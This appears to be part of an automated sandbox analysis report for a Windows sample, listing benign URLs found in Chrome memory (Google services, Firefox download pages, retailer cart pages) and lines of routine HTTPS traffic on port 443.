Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0B4
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0BJ
Source: chrome.exe, 0000002C.00000002.172384589063.00000C64018A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000002C.00000003.172278431909.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000002C.00000003.172279262207.00000C64018DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000002C.00000003.172272352963.00000C6400A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 0000002C.00000002.172368575281.00000C6400030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640115F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 0000002C.00000003.172272352963.00000C6400A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640115F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: chrome.exe, 0000002C.00000002.172376198228.00000C6400C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: chrome.exe, 00000017.00000003.169456848549.00000D7400594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169460030676.00000D7400594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458457831.00000D7400594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169457901127.00000D7400590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371718507.00000C640058C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172373177537.00000C640088C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api2/aframe
Source: chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=adobe
Source: chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371045661.00000C64003BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=at
Source: chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=autoit
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369014600.00000C64000D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=bios320.exe
Source: chrome.exe, 0000002C.00000002.172372691824.00000C6400805000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383480681.00000C6401630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: chrome.exe, 0000002C.00000002.172369014600.00000C64000D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=firefox
Source: chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379801465.00000C640122C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=java
Source: chrome.exe, 0000002C.00000002.172379122693.00000C6401168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376508378.00000C6400CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=testzentrum
Source: chrome.exe, 0000002C.00000002.172376508378.00000C6400CBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGMP
Source: chrome.exe, 00000017.00000003.169455820763.00000D74015D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000017.00000003.169453225407.00000D740044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451851030.00000D740044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272516786.00000C640044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371208049.00000C640044C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com:443
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000002C.00000002.172370586589.00000C6400320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000017.00000003.169436742836.00000D7000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169436974674.00000D7000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172367969728.00000C6000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172260683211.00000C6000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172260291643.00000C6000650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 0000002C.00000003.172299941373.00000C6401EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172300088772.00000C6401EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.groupon.com/cart
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000002C.00000002.172368849375.00000C64000A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372822256.00000C6400810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.guitarcenter.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.homedepot.com/mycart/home
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hottopic.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hsn.com/checkout/bag
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jcpenney.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jcrew.com/checkout/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.joann.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.landsend.com/shopping-bag/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lowes.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lulus.com/checkout/bag
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.macys.com/my-bag
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.midwayusa.com/cart
Source: chrome.exe, 0000002C.00000002.172370117208.00000C64001E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: chrome.exe, 0000002C.00000002.172370117208.00000C64001E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370117208.00000C64001E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377557852.00000C6400E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release1.2.164946
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172373709547.00000C6400928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370117208.00000C64001E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374307525.00000C64009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369787514.00000C6400194000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369787514.00000C6400194000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/#
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377557852.00000C6400E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377557852.00000C6400E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0B
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/ODownload
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/e
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nike.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nordstrom.com/shopping-bag
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/setup
Source: chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.oracle.com/search/results
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.otterbox.com/en-us/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.overstock.com/cart
Source: chrome.exe, 0000002C.00000002.172373575718.00000C64008F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.petsmart.com/cart/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pier1.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pokemoncenter.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qvc.com/checkout/cart.html
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.redbubble.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rei.com/ShoppingCart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rockauto.com/en/cart/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.saksfifthavenue.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.samsclub.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sephora.com/basket
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.shutterfly.com/cart/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.staples.com/cc/mmx/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.talbots.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.target.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.therealreal.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ulta.com/bag
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.underarmour.com/en-us/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.urbanoutfitters.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.vitalsource.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.walgreens.com/cart/view-ui
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.walmart.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.westelm.com/shoppingcart/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wiley.com/en-us/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wish.com/cart
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381586361.00000C6401438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlndler
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlr7
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zappos.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372822256.00000C6400810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zazzle.com/co/cart
Source: chrome.exe, 0000002C.00000002.172372822256.00000C6400810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zennioptical.com/shoppingCart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www2.hm.com/en_us/cart

Source: unknown	Network traffic detected: HTTP traffic on port 61436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56718
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58983
Source: unknown	Network traffic detected: HTTP traffic on port 58988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58989
Source: unknown	Network traffic detected: HTTP traffic on port 53018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58986
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58991
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58990
Source: unknown	Network traffic detected: HTTP traffic on port 58996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51447
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56733
Source: unknown	Network traffic detected: HTTP traffic on port 61694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58641
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64543 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52142
Source: unknown	Network traffic detected: HTTP traffic on port 61088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 51447 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
